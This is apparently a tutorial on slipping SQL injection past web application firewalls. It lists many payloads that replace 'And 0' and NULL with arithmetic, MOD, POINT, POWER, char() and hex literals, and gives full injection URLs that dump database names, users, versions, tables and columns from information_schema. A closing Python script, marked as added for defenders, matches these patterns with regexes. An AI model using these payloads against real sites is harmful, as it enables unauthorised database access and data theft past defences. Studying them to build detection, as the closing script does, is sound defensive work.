The traditional way using And 0
The ordinary form of And 0 is easily detected by a WAF and triggers it immediately, so that query becomes unusable. The examples below describe the traditional ways of writing a false value in SQL injection.
And 1=0
And false
And 0
And 1
And 50=60
Comparing any two numbers that are not equal evaluates to a false value (0, false, null).
The alternative way of using And 0
The following methods are newly discovered expressions, each supported by its respective SQL dialect, that serve as alternative ways of producing a false, null or 0 value.
1) Any Mathematical/Arithmetic or Logical expression that equals 0
And 1*0
And 1-1
And 0/1
For example:
http://website.com/index.php?id=1' and 1*0 order by 10--
2) Using MOD()
SELECT mod(10, 2);
This mod() call returns 0, because 10 divided by 2 leaves no remainder.
For example:
http://website.com/index.php?id=1 and mod(29,9) Order by 10--
3) Using POINT()
SELECT point(29, 9);
For example:
http://website.com/index.php?id=1 and point(29,9) Order by 10--
4) Using POWER()
SELECT power(5,5);
For example:
http://website.com/index.php?id=1 and power(5,5) Order by 10--
Illegal parameter data types
The error "Illegal parameter data types INT and row for operation '='" relates to the data type of the column used in the condition. It can occur for several reasons, and the operators below behave differently in this respect.
1) For operation MOD
% = Modulo
For example:
http://website.com/index.php?id=1 % point(29,9) Order by 10--
2) For operation &
& = Bitwise AND
&& = Logical AND
For example:
http://website.com/index.php?id=1 && point(29,9) Order by 10--
3) For operation OR
| = Bitwise OR
|| = Logical OR (sometimes used as the string concatenation operator)
For example:
http://website.com/index.php?id=1 || point(29,9) Order by 10--
The traditional way of using Null
The ordinary form of Null is easily detected by a WAF and triggers it immediately, so that query becomes unusable. The example below shows the traditional way of using null in SQL injection.
Union Select null, null, null, null
The alternative way of using Null
1) Using 0
UNION SELECT 0,0,0,0
For example:
http://website.com/index.php?id=1 div 0 Union Select 0,0,0,0 (SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),0,0--+"
2) Using false
UNION SELECT false,false,false,false
For example:
http://website.com/index.php?id=1 div false Union Select false,false,false,false,SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),false--+
3) Using char()
UNION SELECT char(null),char(null),char(null),char(null)
UNION SELECT char(false),char(false),char(false),char(false)
UNION SELECT char(0),char(0),char(0),char(0)
UNION SELECT char(0x4e554c4c),char(0x4e554c4c),char(0x4e554c4c),char(0x4e554c4c)
For example:
http://website.com/index.php?id=1 div char(false) Union Select "char(false) div char(false) Union Select char(false),char(false),char(false),char(false),concat(0x222f3e,0x3c62723e,0x3c62723e,'<br>','Database :: ',database(),0x3c62723e,'User ::',user(),0x3c62723e,'Version ::',version(),0x3c62723e,user(),make_set(6,@:=0x0a, (select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),0x3c62723e),char(false)--+",char(false),char(false),char(false),char(false),char(false)--+
4) Using an Arithmetic or Logical Operator
UNION SELECT (0*1337-0),(0*1337-0),(0*1337-0),(0*1337-0)
UNION SELECT 34=35,34=35,34=35,34=35
For example:
http://website.com/index.php?id=1 div (0*1337-0) Union Select "(0*1337-0) div (0*1337-0) Union Select (0*1337-0),(0*1337-0),(0*1337-0),(0*1337-0),concat(0x222f3e,0x3c62723e,0x3c62723e,'<br>','Database ::',database(),0x3c62723e,'User :: ',user(),0x3c62723e,'Version ::',version(),0x3c62723e,user(),make_set(6,@:=0x0a, (select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),0x3c62723e),(0*1337-0)--+",(0*1337-0),(0*1337-0), (0*1337-0),(0*1337-0),(0*1337-0)--+
Bypassing Static Web Application Firewall with 0xHEX values
Since 0xHEX literals are accepted and widely used in SQL queries and injection payloads, they are an effective way to bypass static, signature-based firewalls. With this technique it is possible to avoid the words NULL and false and the single quote character ('). Below are the payloads from the sections above, with their values converted to 0xHEX format.
SELECT CHAR(NULL); → SELECT CHAR(0x4e554c4c);
SELECT CHAR(0); → SELECT CHAR(0x30);
SELECT MOD(29, 9); → SELECT MOD(0x3239, 0x39);
SELECT POINT(29, 9); → SELECT POINT(0x3239, 0x39);
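As an added defender's example that is not part of the original post, the following Python script shows that the alternatives above remain identifiable when a rule set matches the building blocks they share rather than the literal "And 0": it URL-decodes each request, looks for a boolean operator followed by a value, constant arithmetic, MOD/POINT/POWER/CHAR calls, hex literals, UNION SELECT and a trailing comment, and requires two independent signals before flagging a request. The request lines, rule names and threshold are constructed for this example and are assumptions, not part of any real WAF.

```python
import re
from typing import List
from urllib.parse import unquote_plus

# Constructed sample request lines (not taken from any real log): benign traffic
# followed by the "And 0" and null alternatives discussed above.
SAMPLE_REQUESTS = [
    "/index.php?id=1",
    "/index.php?id=42&page=2&sort=name",
    "/download.php?token=0x1f&id=7",
    "/index.php?id=1' and 1*0 order by 10--",
    "/index.php?id=1 and mod(29,9) Order by 10--",
    "/index.php?id=1 || point(29,9) Order by 10--",
    "/index.php?id=1+div+0+Union+Select+0,0,0,0--+",
    "/index.php?id=1 and power(0x35,0x35)--",
]

# Token-level rules (assumed names): each one matches a building block that the
# arithmetic, function-call and hex variants have in common.
RULES = {
    "boolean_operator_then_value": re.compile(r"(?:\band\b|\bor\b|\bdiv\b|&&|\|\|)\s*[(\d]"),
    "arithmetic_on_constants": re.compile(r"\d\s*[*/+%-]\s*\d"),
    "zero_producing_function": re.compile(r"\b(?:mod|point|power|char)\s*\("),
    "hex_literal": re.compile(r"\b0x[0-9a-f]+\b"),
    "union_select": re.compile(r"\bunion\s+select\b"),
    "trailing_comment": re.compile(r"--\s*$|--\+"),
}


def normalize(raw: str) -> str:
    """URL-decode ('+' and %xx) and lowercase so case and encoding do not hide tokens."""
    return unquote_plus(raw).lower()


def matched_rules(raw: str) -> List[str]:
    """Return the names of every rule that fires on the decoded request."""
    text = normalize(raw)
    return [name for name, rx in RULES.items() if rx.search(text)]


def is_suspicious(raw: str) -> bool:
    # Two independent signals are required, so a lone number or a lone hex
    # token in a benign parameter (see the download.php line) is not flagged.
    return len(matched_rules(raw)) >= 2


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(f"{is_suspicious(req)!s:5} {matched_rules(req)} {req}")
```

The threshold is the tunable part: raising it lowers false positives on free-text parameters, lowering it catches single-token variants at the cost of noise.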